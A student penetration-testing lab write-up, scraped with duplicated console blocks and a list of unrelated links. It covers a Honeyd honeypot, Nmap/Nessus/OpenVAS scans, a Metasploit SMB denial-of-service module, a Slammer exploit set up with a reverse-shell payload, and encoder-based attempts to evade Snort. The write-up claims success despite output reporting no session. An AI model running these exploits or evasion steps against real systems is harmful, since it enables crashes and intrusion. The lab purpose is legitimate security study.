sudo honeyd -f /etc/honeypot/myfakemachine.conf 145.100.105.197Honeyd V1.5c Copyright (c) 2002-2007 Niels Provoshoneyd[30337]: started with -f /etc/honeypot/myfakemachine.conf 145.100.105.197honeyd[30337]: listening promiscuously on eth0: (arp or ip proto 47 or (udp and src port 67 and dst port 68) or (ip )) and not ether src 00:16:3e:59:34:7d/etc/honeypot/honeyd.conf:2: Unknown personality "Windows NT 4.0 Server SP5-SP6"honeyd: parsing configuration file failed
I changed the personality to “Microsoft Windows XP Professional”. This solved the problem:
123456
sudo honeyd -f /etc/honeypot/myfakemachine.conf 145.100.105.197 Honeyd V1.5c Copyright (c) 2002-2007 Niels Provoshoneyd[30343]: started with -f /etc/honeypot/myfakemachine.conf 145.100.105.197honeyd[30343]: listening promiscuously on eth0: (arp or ip proto 47 or (udp and src port 67 and dst port 68) or (ip )) and not ether src 00:16:3e:59:34:7dHoneyd starting as background process
sudo honeyd -f /etc/honeypot/myfakemachine.conf 145.100.105.197Honeyd V1.5c Copyright (c) 2002-2007 Niels Provoshoneyd[30343]: started with -f /etc/honeypot/myfakemachine.conf 145.100.105.197honeyd[30343]: listening promiscuously on eth0: (arp or ip proto 47 or (udp and src port 67 and dst port 68) or (ip )) and not ether src 00:16:3e:59:34:7dHoneyd starting as background process
We tried to ping the machine:
12345
ping 145.100.105.197PING 145.100.105.197 (145.100.105.197) 56(84) bytes of data.From 145.100.105.196 icmp_seq=1 Destination Host UnreachableFrom 145.100.105.196 icmp_seq=2 Destination Host UnreachableFrom 145.100.105.196 icmp_seq=3 Destination Host Unreachable
ping 145.100.105.197PING 145.100.105.197 (145.100.105.197) 56(84) bytes of data.From 145.100.105.196 icmp_seq=1 Destination Host UnreachableFrom 145.100.105.196 icmp_seq=2 Destination Host UnreachableFrom 145.100.105.196 icmp_seq=3 Destination Host Unreachable
But this was not really a great success… We tried to restart everything, double checked all configurations… In the end I tried to ping from another system than my HVM, and that worked just fine!
- Scan it with Nmap including version detection.
- Does nmap think that it’s a real device?
To scan for open ports with nmap, we used the following command:
12345678910111213141516171819202122232425262728293031323334353637
nmap -A -T4 145.100.105.197 Starting Nmap 5.00 ( http://nmap.org ) at 2010-04-12 13:08 CESTInteresting ports on 145.100.105.197:Not shown: 996 closed portsPORT STATE SERVICE VERSION23/tcp open tcpwrapped25/tcp open tcpwrapped80/tcp open tcpwrapped139/tcp open netbios-ssn?No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).TCP/IP fingerprint:OS:SCAN(V=5.00%D=4/12%OT=23%CT=1%CU=33139%PV=N%DS=2%G=Y%TM=4BC2FFD4%P=i686-OS:pc-linux-gnu)SEQ(SP=A0%GCD=1%ISR=A8%TI=I%CI=I%II=I%SS=S%TS=U)OPS(O1=M5B4OS:NW0%O2=M5B4NW0%O3=M5B4NW0%O4=M5B4NW0%O5=M5B4NW0%O6=M5B4NW0)WIN(W1=F424%WOS:2=F424%W3=F424%W4=F424%W5=F424%W6=F424)ECN(R=Y%DF=Y%T=40%W=F424%O=M5B4NWOS:0%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=N%T=40%W=0%S=OS:A%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=40%W=F424%S=O%A=S+%F=AS%O=M5B4NW0%RDOS:=0%Q=)T3(R=Y%DF=Y%T=40%W=F424%S=O%A=O%F=AS%O=M5B4NW0%RD=0%Q=)T4(R=Y%DF=NOS:%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=N%T=40%W=0%S=A%A=S+%F=AR%O=%ROS:D=0%Q=)T6(R=Y%DF=N%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=N%T=40%W=0%OS:S=A%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=38%UN=0%RIPL=G%RID=G%RIPCKOS:=G%RUCK=G%RUD=G)IE(R=Y%DFI=Y%T=80%CD=Z) Network Distance: 2 hops Host script results:|_ nbstat: ERROR: Name query failed: TIMEOUT TRACEROUTE (using port 587/tcp)HOP RTT ADDRESS1 1.42 router.students.os3.nl (145.100.102.129)2 0.23 spearow.studlab.os3.nl (145.100.104.21)3 0.90 145.100.105.197 OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 186.52 seconds
nmap -A -T4 145.100.105.197Starting Nmap 5.00 ( http://nmap.org ) at 2010-04-12 13:08 CESTInteresting ports on 145.100.105.197:Not shown: 996 closed portsPORT STATE SERVICE VERSION23/tcp open tcpwrapped25/tcp open tcpwrapped80/tcp open tcpwrapped139/tcp open netbios-ssn?No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).TCP/IP fingerprint:OS:SCAN(V=5.00%D=4/12%OT=23%CT=1%CU=33139%PV=N%DS=2%G=Y%TM=4BC2FFD4%P=i686-OS:pc-linux-gnu)SEQ(SP=A0%GCD=1%ISR=A8%TI=I%CI=I%II=I%SS=S%TS=U)OPS(O1=M5B4OS:NW0%O2=M5B4NW0%O3=M5B4NW0%O4=M5B4NW0%O5=M5B4NW0%O6=M5B4NW0)WIN(W1=F424%WOS:2=F424%W3=F424%W4=F424%W5=F424%W6=F424)ECN(R=Y%DF=Y%T=40%W=F424%O=M5B4NWOS:0%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=N%T=40%W=0%S=OS:A%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=40%W=F424%S=O%A=S+%F=AS%O=M5B4NW0%RDOS:=0%Q=)T3(R=Y%DF=Y%T=40%W=F424%S=O%A=O%F=AS%O=M5B4NW0%RD=0%Q=)T4(R=Y%DF=NOS:%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=N%T=40%W=0%S=A%A=S+%F=AR%O=%ROS:D=0%Q=)T6(R=Y%DF=N%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=N%T=40%W=0%OS:S=A%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=38%UN=0%RIPL=G%RID=G%RIPCKOS:=G%RUCK=G%RUD=G)IE(R=Y%DFI=Y%T=80%CD=Z)Network Distance: 2 hopsHost script results:|_ nbstat: ERROR: Name query failed: TIMEOUTTRACEROUTE (using port 587/tcp)HOP RTT ADDRESS1 1.42 router.students.os3.nl (145.100.102.129)2 0.23 spearow.studlab.os3.nl (145.100.104.21)3 0.90 145.100.105.197OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 186.52 seconds
- -A: This parameter enables version detection
- -T4: This parameter is for faster execution
An attacker could think that this is a fake device, because the OS is not being recognized by nmap.
- Scan it with Nessus and OpenVAS.
- Do Nesses and OpenVAS think that it’s a real device?
12345678910
/opt/nessus/bin/nessuscmd -q 145.100.105.197Starting nessuscmd 4.2.1Scanning '145.100.105.197'... + Results found on 145.100.105.197 : - Port telnet (23/tcp) is open - Port smtp (25/tcp) is open - Port http (80/tcp) is open - Port netbios-ns (137/tcp) is open - Port netbios-ssn (139/tcp) is open
/opt/nessus/bin/nessuscmd -q 145.100.105.197Starting nessuscmd 4.2.1Scanning '145.100.105.197'...+ Results found on 145.100.105.197 : - Port telnet (23/tcp) is open - Port smtp (25/tcp) is open - Port http (80/tcp) is open - Port netbios-ns (137/tcp) is open - Port netbios-ssn (139/tcp) is open
1234
sudo openvassdAll plugins loadedsudo echo "145.100.105.196" >> iptoscan.txtsudo OpenVAS-Client -q 127.0.0.1 9390 jeroen ids iptoscan.txt scanresults2.html -T html
sudo openvassdAll plugins loadedsudo echo "145.100.105.196" >> iptoscan.txtsudo OpenVAS-Client -q 127.0.0.1 9390 jeroen ids iptoscan.txt scanresults2.html -T html
Both vulnerability scanners do not detect that it is a virtual machine. The only related thing that OpenVAS detects is that theOS is unknown.
- Vulnerability testing:
- Install Metasploit http://www.metasploit.com/framework/
We downloaded the metaploit framework from:
1
http://www.metasploit.com/framework/download/
http://www.metasploit.com/framework/download/
Then we installed the framework:
12345678910
sudo sh framework-3.3.3-linux-i686.run This installer will place Metasploit into the /opt/metasploit3 directory.Continue (yes/no) > yesWould you like to automatically update Metasploit?AutoUpdate? (yes/no) > yesWould you like to update Metasploit right now?Update? (yes/no) > yes sudo msfconsole
sudo sh framework-3.3.3-linux-i686.run This installer will place Metasploit into the /opt/metasploit3 directory.Continue (yes/no) > yesWould you like to automatically update Metasploit?AutoUpdate? (yes/no) > yesWould you like to update Metasploit right now?Update? (yes/no) > yessudo msfconsole
- Try to exploit the weaknesses that are found with Nessus and OpenVAS.
We scanned a Windows 2003 Server for vulnerabilities. We enabled the following services:
- RPC
- Server
- Netbios
Nessus gave the following results:
12345678910
/opt/nessus/bin/nessuscmd 145.100.105.213Starting nessuscmd 4.2.1Scanning '145.100.105.213'... + Results found on 145.100.105.213 : - Port epmap (135/tcp) is open - Port netbios-ssn (139/tcp) is open - Port microsoft-ds (445/tcp) is open - Port blackjack (1025/tcp) is open - Port cap (1026/tcp) is open
/opt/nessus/bin/nessuscmd 145.100.105.213Starting nessuscmd 4.2.1Scanning '145.100.105.213'...+ Results found on 145.100.105.213 : - Port epmap (135/tcp) is open - Port netbios-ssn (139/tcp) is open - Port microsoft-ds (445/tcp) is open - Port blackjack (1025/tcp) is open - Port cap (1026/tcp) is open
The OpenVAS scan resulted in this:
As you can, 2 vulnerabilities were found:
The first one is a rather well-known vulnerability, and is thereby also known by metasploit:
123456789
msf > search ms09_001[*] Searching loaded modules for pattern 'ms09_001'... Auxiliary========= Name Rank Description ---- ---- ----------- dos/windows/smb/ms09_001_write normal Microsoft SRV.SYS WriteAndX Invalid DataOffset
msf > search ms09_001[*] Searching loaded modules for pattern 'ms09_001'...Auxiliary========= Name Rank Description ---- ---- ----------- dos/windows/smb/ms09_001_write normal Microsoft SRV.SYS WriteAndX Invalid DataOffset
We tried to exploit this by doing the following in msfconsole:
1234567891011121314151617181920212223242526272829303132333435363738394041424344
msf > use auxiliary/dos/windows/smb/ms09_001_writemsf auxiliary(ms09_001_write) > set RHOST 145.100.105.213RHOST => 145.100.105.213msf auxiliary(ms09_001_write) > run Attempting to crash the remote host...datalenlow=65535 dataoffset=65535 fillersize=72datalenlow=55535 dataoffset=65535 fillersize=72datalenlow=45535 dataoffset=65535 fillersize=72datalenlow=35535 dataoffset=65535 fillersize=72datalenlow=25535 dataoffset=65535 fillersize=72datalenlow=15535 dataoffset=65535 fillersize=72datalenlow=65535 dataoffset=55535 fillersize=72datalenlow=55535 dataoffset=55535 fillersize=72datalenlow=45535 dataoffset=55535 fillersize=72datalenlow=35535 dataoffset=55535 fillersize=72datalenlow=25535 dataoffset=55535 fillersize=72datalenlow=15535 dataoffset=55535 fillersize=72datalenlow=65535 dataoffset=45535 fillersize=72datalenlow=55535 dataoffset=45535 fillersize=72datalenlow=45535 dataoffset=45535 fillersize=72datalenlow=35535 dataoffset=45535 fillersize=72datalenlow=25535 dataoffset=45535 fillersize=72datalenlow=15535 dataoffset=45535 fillersize=72datalenlow=65535 dataoffset=35535 fillersize=72datalenlow=55535 dataoffset=35535 fillersize=72datalenlow=45535 dataoffset=35535 fillersize=72datalenlow=35535 dataoffset=35535 fillersize=72datalenlow=25535 dataoffset=35535 fillersize=72datalenlow=15535 dataoffset=35535 fillersize=72datalenlow=65535 dataoffset=25535 fillersize=72datalenlow=55535 dataoffset=25535 fillersize=72datalenlow=45535 dataoffset=25535 fillersize=72datalenlow=35535 dataoffset=25535 fillersize=72datalenlow=25535 dataoffset=25535 fillersize=72datalenlow=15535 dataoffset=25535 fillersize=72datalenlow=65535 dataoffset=15535 fillersize=72datalenlow=55535 dataoffset=15535 fillersize=72datalenlow=45535 dataoffset=15535 fillersize=72datalenlow=35535 dataoffset=15535 fillersize=72datalenlow=25535 dataoffset=15535 fillersize=72datalenlow=15535 dataoffset=15535 fillersize=72[*] Auxiliary module execution completedmsf auxiliary(ms09_001_write) >
msf > use auxiliary/dos/windows/smb/ms09_001_writemsf auxiliary(ms09_001_write) > set RHOST 145.100.105.213RHOST => 145.100.105.213msf auxiliary(ms09_001_write) > runAttempting to crash the remote host...datalenlow=65535 dataoffset=65535 fillersize=72datalenlow=55535 dataoffset=65535 fillersize=72datalenlow=45535 dataoffset=65535 fillersize=72datalenlow=35535 dataoffset=65535 fillersize=72datalenlow=25535 dataoffset=65535 fillersize=72datalenlow=15535 dataoffset=65535 fillersize=72datalenlow=65535 dataoffset=55535 fillersize=72datalenlow=55535 dataoffset=55535 fillersize=72datalenlow=45535 dataoffset=55535 fillersize=72datalenlow=35535 dataoffset=55535 fillersize=72datalenlow=25535 dataoffset=55535 fillersize=72datalenlow=15535 dataoffset=55535 fillersize=72datalenlow=65535 dataoffset=45535 fillersize=72datalenlow=55535 dataoffset=45535 fillersize=72datalenlow=45535 dataoffset=45535 fillersize=72datalenlow=35535 dataoffset=45535 fillersize=72datalenlow=25535 dataoffset=45535 fillersize=72datalenlow=15535 dataoffset=45535 fillersize=72datalenlow=65535 dataoffset=35535 fillersize=72datalenlow=55535 dataoffset=35535 fillersize=72datalenlow=45535 dataoffset=35535 fillersize=72datalenlow=35535 dataoffset=35535 fillersize=72datalenlow=25535 dataoffset=35535 fillersize=72datalenlow=15535 dataoffset=35535 fillersize=72datalenlow=65535 dataoffset=25535 fillersize=72datalenlow=55535 dataoffset=25535 fillersize=72datalenlow=45535 dataoffset=25535 fillersize=72datalenlow=35535 dataoffset=25535 fillersize=72datalenlow=25535 dataoffset=25535 fillersize=72datalenlow=15535 dataoffset=25535 fillersize=72datalenlow=65535 dataoffset=15535 fillersize=72datalenlow=55535 dataoffset=15535 fillersize=72datalenlow=45535 dataoffset=15535 fillersize=72datalenlow=35535 dataoffset=15535 fillersize=72datalenlow=25535 dataoffset=15535 fillersize=72datalenlow=15535 dataoffset=15535 fillersize=72[*] Auxiliary module execution completedmsf auxiliary(ms09_001_write) >
While exploiting this vulnerability I checked the snort rules> I gave me a lot of output, all similar to the records below:
123456789101112131415161718192021222324252627282930
[**] [1:2465:7] NETBIOS SMB-DS IPC$ share access [**][Classification: Generic Protocol Command Decode] [Priority: 3]04/21-15:53:22.055795 145.100.102.131:60094 -> 145.100.105.213:445TCP TTL:63 TOS:0x0 ID:23121 IpLen:20 DgmLen:129 DF***AP*** Seq: 0xC09C71C9 Ack: 0xFB04529A Win: 0x6C TcpLen: 32TCP Options (3) => NOP NOP TS: 5387669 6519 [**] [1:2465:7] NETBIOS SMB-DS IPC$ share access [**][Classification: Generic Protocol Command Decode] [Priority: 3]04/21-15:53:22.225651 145.100.102.131:57008 -> 145.100.105.213:445TCP TTL:63 TOS:0x0 ID:54200 IpLen:20 DgmLen:129 DF***AP*** Seq: 0xC067E8AA Ack: 0xBE5EFED Win: 0x6C TcpLen: 32TCP Options (3) => NOP NOP TS: 5387711 6521......... [**] [1:2465:7] NETBIOS SMB-DS IPC$ share access [**][Classification: Generic Protocol Command Decode] [Priority: 3]04/21-15:53:28.856311 145.100.102.131:51774 -> 145.100.105.213:445TCP TTL:63 TOS:0x0 ID:9359 IpLen:20 DgmLen:129 DF***AP*** Seq: 0xC65D1B40 Ack: 0x5842F684 Win: 0x6C TcpLen: 32TCP Options (3) => NOP NOP TS: 5389369 6587 [**] [1:2465:7] NETBIOS SMB-DS IPC$ share access [**][Classification: Generic Protocol Command Decode] [Priority: 3]04/21-15:53:29.006929 145.100.102.131:46062 -> 145.100.105.213:445TCP TTL:63 TOS:0x0 ID:23546 IpLen:20 DgmLen:129 DF***AP*** Seq: 0xC6B16A51 Ack: 0x7395A1E4 Win: 0x6C TcpLen: 32TCP Options (3) => NOP NOP TS: 5389407 6589
[**] [1:2465:7] NETBIOS SMB-DS IPC$ share access [**][Classification: Generic Protocol Command Decode] [Priority: 3]04/21-15:53:22.055795 145.100.102.131:60094 -> 145.100.105.213:445TCP TTL:63 TOS:0x0 ID:23121 IpLen:20 DgmLen:129 DF***AP*** Seq: 0xC09C71C9 Ack: 0xFB04529A Win: 0x6C TcpLen: 32TCP Options (3) => NOP NOP TS: 5387669 6519 [**] [1:2465:7] NETBIOS SMB-DS IPC$ share access [**][Classification: Generic Protocol Command Decode] [Priority: 3]04/21-15:53:22.225651 145.100.102.131:57008 -> 145.100.105.213:445TCP TTL:63 TOS:0x0 ID:54200 IpLen:20 DgmLen:129 DF***AP*** Seq: 0xC067E8AA Ack: 0xBE5EFED Win: 0x6C TcpLen: 32TCP Options (3) => NOP NOP TS: 5387711 6521.........[**] [1:2465:7] NETBIOS SMB-DS IPC$ share access [**][Classification: Generic Protocol Command Decode] [Priority: 3]04/21-15:53:28.856311 145.100.102.131:51774 -> 145.100.105.213:445TCP TTL:63 TOS:0x0 ID:9359 IpLen:20 DgmLen:129 DF***AP*** Seq: 0xC65D1B40 Ack: 0x5842F684 Win: 0x6C TcpLen: 32TCP Options (3) => NOP NOP TS: 5389369 6587 [**] [1:2465:7] NETBIOS SMB-DS IPC$ share access [**][Classification: Generic Protocol Command Decode] [Priority: 3]04/21-15:53:29.006929 145.100.102.131:46062 -> 145.100.105.213:445TCP TTL:63 TOS:0x0 ID:23546 IpLen:20 DgmLen:129 DF***AP*** Seq: 0xC6B16A51 Ack: 0x7395A1E4 Win: 0x6C TcpLen: 32TCP Options (3) => NOP NOP TS: 5389407 6589
More information about this exploit: http://www.metasploit.com/modules/auxiliary/dos/windows/smb/ms09_001_write
- Launch a well known UDP based MSSQL attack against you VM.
- Doesn’t matter whether MSSQL is installed or not.
We tried a few other exploits first, but they did not work out. This is because those attacks were TCP based, while the following is UDP based:
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657
msf > use windows/mssql/ms02_039_slammermsf exploit(ms02_039_slammer) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- HEX2BINARY /opt/metasploit3/msf3/data/exploits/mssql/h2b no The path to the hex2binary script on the disk MSSQL_PASS no The password for the specified username MSSQL_USER sa no The username to authenticate as RHOST yes The target address RPORT 1434 yes The target port Exploit target: Id Name -- ---- 0 MSSQL 2000 / MSDE <= SP2 msf exploit(ms02_039_slammer) > set rhost 145.100.105.196rhost => 145.100.105.196msf exploit(ms02_039_slammer) > set payload windows/shell/reverse_tcppayload => windows/shell/reverse_tcpmsf exploit(ms02_039_slammer) > set lhost 145.100.102.131lhost => 145.100.102.131msf exploit(ms02_039_slammer) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- HEX2BINARY /opt/metasploit3/msf3/data/exploits/mssql/h2b no The path to the hex2binary script on the disk MSSQL_PASS no The password for the specified username MSSQL_USER sa no The username to authenticate as RHOST 145.100.105.196 yes The target address RPORT 1434 yes The target port Payload options (windows/shell/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process LHOST 145.100.102.131 yes The local address LPORT 4444 yes The local port Exploit target: Id Name -- ---- 0 MSSQL 2000 / MSDE <= SP2 msf exploit(ms02_039_slammer) > exploit [*] Started reverse handler on port 4444[*] Sending UDP packet with return address 0x42b48774[*] Execute 'net start sqlserveragent' once access is obtained[*] Exploit completed, but no session was created.
msf > use windows/mssql/ms02_039_slammermsf exploit(ms02_039_slammer) > show optionsModule options: Name Current Setting Required Description ---- --------------- -------- ----------- HEX2BINARY /opt/metasploit3/msf3/data/exploits/mssql/h2b no The path to the hex2binary script on the disk MSSQL_PASS no The password for the specified username MSSQL_USER sa no The username to authenticate as RHOST yes The target address RPORT 1434 yes The target portExploit target: Id Name -- ---- 0 MSSQL 2000 / MSDE <= SP2msf exploit(ms02_039_slammer) > set rhost 145.100.105.196rhost => 145.100.105.196msf exploit(ms02_039_slammer) > set payload windows/shell/reverse_tcppayload => windows/shell/reverse_tcpmsf exploit(ms02_039_slammer) > set lhost 145.100.102.131lhost => 145.100.102.131msf exploit(ms02_039_slammer) > show optionsModule options: Name Current Setting Required Description ---- --------------- -------- ----------- HEX2BINARY /opt/metasploit3/msf3/data/exploits/mssql/h2b no The path to the hex2binary script on the disk MSSQL_PASS no The password for the specified username MSSQL_USER sa no The username to authenticate as RHOST 145.100.105.196 yes The target address RPORT 1434 yes The target portPayload options (windows/shell/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process LHOST 145.100.102.131 yes The local address LPORT 4444 yes The local portExploit target: Id Name -- ---- 0 MSSQL 2000 / MSDE <= SP2msf exploit(ms02_039_slammer) > exploit[*] Started reverse handler on port 4444[*] Sending UDP packet with return address 0x42b48774[*] Execute 'net start sqlserveragent' once access is obtained[*] Exploit completed, but no session was created.
This exploit succeeded!
- Is this action detected by Snort?
No nothing was detected by snort.
- Try different encoders using Metasploit evasion options / msfencode.
- what is Snort telling you?
1234567891011121314151617
msf > use windows/mssql/ms02_039_slammermsf exploit(ms02_039_slammer) > set rhost 145.100.105.196rhost => 145.100.105.196msf exploit(ms02_039_slammer) > set payload windows/shell/reverse_tcppayload => windows/shell/reverse_tcpmsf exploit(ms02_039_slammer) > set encoder x86/shikata_ga_naiencoder => x86/shikata_ga_naimsf exploit(ms02_039_slammer) > set EnableContextEncoding 1EnableContextEncoding => 1msf exploit(ms02_039_slammer) > set ContectInformationFile application.mapContectInformationFile => application.mapmsf exploit(ms02_039_slammer) > set lhost 145.100.102.131lhost => 145.100.102.131msf exploit(ms02_039_slammer) > exploit [-] Exploit failed: No encoders encoded the buffer successfully.[*] Exploit completed, but no session was created.
msf > use windows/mssql/ms02_039_slammermsf exploit(ms02_039_slammer) > set rhost 145.100.105.196rhost => 145.100.105.196msf exploit(ms02_039_slammer) > set payload windows/shell/reverse_tcppayload => windows/shell/reverse_tcpmsf exploit(ms02_039_slammer) > set encoder x86/shikata_ga_naiencoder => x86/shikata_ga_naimsf exploit(ms02_039_slammer) > set EnableContextEncoding 1EnableContextEncoding => 1msf exploit(ms02_039_slammer) > set ContectInformationFile application.mapContectInformationFile => application.mapmsf exploit(ms02_039_slammer) > set lhost 145.100.102.131lhost => 145.100.102.131msf exploit(ms02_039_slammer) > exploit[-] Exploit failed: No encoders encoded the buffer successfully.[*] Exploit completed, but no session was created.
The error means the following: The payloads available are determined by the memory ‘Space’ available for the exploit to use.
123456789101112131415161718192021222324252627282930313233343536373839404142434445
msf exploit(ms02_039_slammer) > info Name: Microsoft SQL Server Resolution Overflow Version: 7724 Platform: Windows Privileged: Yes License: Metasploit Framework License (BSD) Rank: Good Provided by: hdm <hdm@metasploit.com> Available targets: Id Name -- ---- 0 MSSQL 2000 / MSDE <= SP2 Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD no The password for the specified username RHOST 145.100.105.196 yes The target address RPORT 1434 yes The target port USERNAME sa no The username to authenticate as Payload information: Space: 512 Avoid: 6 characters Description: This is an exploit for the SQL Server 2000 resolution service buffer overflow. This overflow is triggered by sending a udp packet to port 1434 which starts with 0x04 and is followed by long string terminating with a colon and a number. This module should work against any vulnerable SQL Server 2000 or MSDE install (pre-SP3). References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0649 http://www.osvdb.org/4578 http://www.securityfocus.com/bid/5310 http://www.microsoft.com/technet/security/bulletin/MS02-039.mspx
msf exploit(ms02_039_slammer) > info Name: Microsoft SQL Server Resolution Overflow Version: 7724 Platform: Windows Privileged: Yes License: Metasploit Framework License (BSD) Rank: GoodProvided by: hdm <hdm@metasploit.com>Available targets: Id Name -- ---- 0 MSSQL 2000 / MSDE <= SP2Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD no The password for the specified username RHOST 145.100.105.196 yes The target address RPORT 1434 yes The target port USERNAME sa no The username to authenticate asPayload information: Space: 512 Avoid: 6 charactersDescription: This is an exploit for the SQL Server 2000 resolution service buffer overflow. This overflow is triggered by sending a udp packet to port 1434 which starts with 0x04 and is followed by long string terminating with a colon and a number. This module should work against any vulnerable SQL Server 2000 or MSDE install (pre-SP3).References:http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0649http://www.osvdb.org/4578http://www.securityfocus.com/bid/5310http://www.microsoft.com/technet/security/bulletin/MS02-039.mspx
Here, the payload space is: ‘Space: 500′. However, the target application does not allow certain characters to be used (usually the null character 0×00 as this denotes the end of a string [character array]). The payload cannot permit six characters: ‘Avoid: 6 characters ‘ When we run the exploit, the payload generators will attempt to fit our desired payload into a space of 500 which excludes 6 specific characters. This is not always possible, and will result in the error: No encoders encoded the buffer successfully. I tried a few other payloads, but this resulted in nothing.
< Source >
- Penetration Testing : Applications
- Penetration Testing 渗透测试
- Wardriving & Wireless Penetration Testing
- Penetration Testing IPsec VPNs
- penetration testing report
- Penetration testing guide
- Penetration Testing 渗透测试
- 渗透测试(Penetration Testing)
- Penetration Testing and Network Defense
- 37 Powerful Penetration Testing Tools For Every Penetration Tester
- An Introduction to Penetration Testing(Main)
- Hack I.T.: Security Through Penetration Testing
- Hack I.T.: Security Through Penetration Testing
- OWASP Top 10 penetration testing software
- in house penetration testing pci dss
- 渗透测试(Penetration Testing)简介
- Penetration Testing in the Real World
- SAP Penetration Testing Using Metasploit Final
- 约瑟夫环问题
- Template+=fakelib 小记
- URL编码 java
- 补码的加减运算
- Quartz任务监控管理
- Penetration Testing : Applications
- exists 和 in 区别一
- LinuxShell算术运算
- 我对Java Serializable(序列化)的理解和总结
- 通俗讲解Makefile编写方法<1>
- 原始类型与引用类型
- Silverlight Binding
- exists 和 in 区别二
- delphi 初级学员必备
